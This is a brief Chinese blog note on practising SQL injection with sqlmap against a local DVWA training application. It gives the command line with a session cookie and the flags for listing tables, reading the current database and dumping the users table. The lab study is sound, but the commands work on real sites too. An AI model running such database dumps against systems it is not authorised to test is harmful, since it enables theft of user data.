在DVWA上测试sqlmap

遇见的问题

1.设置安全等级为low后依然执行impossible

找到该文件，将low文件复制到impossible

sql注入

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=impossible; security=low; PHPSESSID=joeovbh2dahqkk1u3tk0osf0c7"

这里cookie中出现两个security，可能就是问题所在。

如果不输入cookie也是可以的

--tables

获取了所有数据库及库中的所有表

--current-db

获取当前数据库名

-T users --dump

获取users表内信息

过程中需要输入no

参考网址

http://blog.chinaunix.net/uid-11582448-id-4432211.html

最后编辑于：2017.12.07 02:24:51

©著作权归作者所有,转载或内容合作请联系作者
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

推荐阅读更多精彩内容

sqlmap其它参数1
--batch 不询问用户选择，全部使用默认选项 sqlmap.py -g "inurl:\".php?id=1\...
Instu阅读 4,001评论 0赞 1
第六章利用 – 低悬的果实
作者：Gilberto Najera-Gutierrez译者：飞龙协议：CC BY-NC-SA 4.0 简介这章...
三月行者阅读 5,876评论 2赞 7
Kali Linux Web 渗透测试秘籍第六章利用 -- 低悬的果实
第六章利用 -- 低悬的果实作者：Gilberto Najera-Gutierrez 译者：飞龙协议：CC ...
布客飞龙阅读 13,281评论 1赞 51
SQLMap用户手册【超详细】
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
xuningbo阅读 13,530评论 2赞 22
sqlmap手册
sqlmap用户手册说明：本文为转载，对原文中一些明显的拼写错误进行修正，并标注对自己有用的信息。 ======...
wind_飘阅读 6,325评论 0赞 5

赞1赞

赞赏

手机看全文